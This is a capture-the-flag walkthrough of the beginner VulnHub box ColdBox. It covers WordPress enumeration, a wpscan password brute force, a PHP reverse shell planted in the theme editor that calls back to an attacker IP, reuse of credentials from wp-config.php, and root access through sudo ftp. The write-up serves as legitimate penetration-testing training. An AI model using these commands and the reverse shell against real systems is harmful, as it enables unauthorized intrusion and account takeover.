Platform: VulnHub | Difficulty: Easy | OS: Linux (Ubuntu) | Author: Abacus

Introduction

C0ldBox is a beginner-friendly VulnHub machine that walks you through a classic attack chain: network discovery → WordPress enumeration → brute-force login → reverse shell via theme editor → credential reuse for lateral movement → privilege escalation via sudo misconfiguration. It's a great box for anyone just starting out with CTFs or penetration testing fundamentals.

Skills covered:

• Network discovery with netdiscover
• Port/service scanning with nmap
• Directory brute-forcing with dirb
• WordPress credential attack with wpscan
• Reverse shell injection via WordPress theme editor
• Lateral movement using credentials from wp-config.php
• Privilege escalation via GTFOBins (ftp sudo exploit)

Step 1 — Network Discovery

The first step is finding the target machine's IP address on the local network. I used netdiscover to scan the subnet:

netdiscover -i eth0

From the ARP scan results, the target IP was identified as 192.168.1.3 (PCS Systemtechnik GmbH MAC — a VirtualBox adapter, confirming it's our VM).

Step 2 — Port Scanning with Nmap

With the IP in hand, I ran a full Nmap service scan:

nmap -sV -sC 192.168.1.3

Results:

Port State Service Version 80/tcp open HTTP Apache 2.4.18 (Ubuntu) — WordPress 4.1.31 4512/tcp open SSH OpenSSH 7.2p2 Ubuntu

Key findings:

• Port 80 is running a WordPress site titled "ColddBox — One more machine"
• Port 4512 is running SSH (non-standard port — worth noting for later)

Step 3 — Web Enumeration

Browsing to http://192.168.1.3 revealed a minimal WordPress homepage with the message "The ColddBox is here" — not much to go on directly.

Since we already know it's WordPress, I used dirb to brute-force directories and find the login panel:

dirb http://192.168.1.3

Interesting paths found:

==> DIRECTORY: http://192.168.1.3/hidden/
==> DIRECTORY: http://192.168.1.3/wp-admin/
==> DIRECTORY: http://192.168.1.3/wp-content/
+ http://192.168.1.3/wp-admin/admin.php

The /wp-admin login page was confirmed live. Default credential combinations didn't work, so it was time to brute force.

Step 4 — WordPress Brute Force with WPScan

Based on the box name c0ldd, I made an educated guess at the username and used wpscan with the classic rockyou.txt wordlist:

wpscan --url http://192.168.1.3 --usernames c0ldd --passwords /usr/share/wordlists/rockyou.txt

After ~1366 requests, we had a hit:

[SUCCESS] - c0ldd / 9876543210
Valid Combinations Found:
 | Username: c0ldd, Password: 9876543210

Logged into the WordPress dashboard successfully.

Step 5 — Remote Code Execution via Theme Editor

Inside the WordPress dashboard, I navigated to:

Appearance → Editor → header.php (Twenty Fifteen theme)

I replaced the entire contents of header.php with a Pentestmonkey PHP reverse shell, updating the IP and port:

$ip = '192.168.1.10';   // Your attacker IP
$port = 7777;

Set up a Netcat listener on the attacker machine:

nc -nlvp 7777

Then refreshed the WordPress homepage to trigger the shell. Got a connection back immediately:

connect to [192.168.1.10] from (UNKNOWN) [192.168.1.3] 55214
Linux ColddBox-Easy 4.4.0-186-generic #216-Ubuntu SMP
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Upgraded to a proper interactive shell:

python -c 'import pty; pty.spawn("/bin/bash")'

Step 6 — Lateral Movement via wp-config.php

Navigated to the WordPress root directory to hunt for credentials:

cd /var/www/html
cat wp-config.php

Found hardcoded database credentials:

define('DB_NAME',     'colddbox');
define('DB_USER',     'c0ldd');
define('DB_PASSWORD', 'cybersecurity');
define('DB_HOST',     'localhost');

Used the DB password to switch to the c0ldd system user:

su c0ldd
Password: cybersecurity

Successfully switched users. Now operating as c0ldd.

Step 7 — Privilege Escalation via Sudo + GTFOBins

Checked what sudo permissions c0ldd has:

sudo -l

Output:

User c0ldd may run the following commands on ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp

Three potential escalation paths! I chose ftp since it's straightforward via GTFOBins.

sudo ftp
ftp> !/bin/sh

Checked privileges:

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root

We are root. 🎉

Step 8 — Capturing the Flag

cd /root
ls
cat root.txt
wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYVNFLW...

Root flag captured!

Summary

Here's the full attack chain at a glance:

Network Scan (netdiscover)
        ↓
Port Scan (nmap) → Port 80: WordPress
        ↓
Directory Enum (dirb) → /wp-admin found
        ↓
Brute Force (wpscan) → c0ldd:9876543210
        ↓
WordPress Login → Theme Editor RCE
        ↓
Reverse Shell (www-data)
        ↓
wp-config.php → DB creds → su c0ldd
        ↓
sudo -l → ftp → !/bin/sh
        ↓
ROOT ✓

Key Takeaways

1. Non-standard SSH ports (like 4512) are worth noting — they might be useful for lateral movement with found credentials.
2. WordPress theme/plugin editors are a classic and powerful RCE vector when admin access is obtained.
3. Config files like wp-config.php often contain credentials that are reused on the system level — always check them.
4. GTFOBins is an essential resource. When sudo -l shows binaries like vim, ftp, or chmod, there's almost always a privesc path.
5. Sudo misconfiguration is one of the most common privesc vectors in real-world environments — always check it.

Tools Used

Tool Purpose netdiscover Host discovery on local network nmap Port & service enumeration dirb Web directory brute-forcing wpscan WordPress vulnerability & credential scanner Pentestmonkey PHP Reverse Shell Remote code execution netcat (nc) Reverse shell listener GTFOBins Privilege escalation reference

Happy hacking! If you found this helpful, follow for more VulnHub and CTF writeups.

— Abacus

Tags: #cybersecurity #ethicalhacking #ctf #vulnhub #penetrationtesting #infosec #linux #wordpress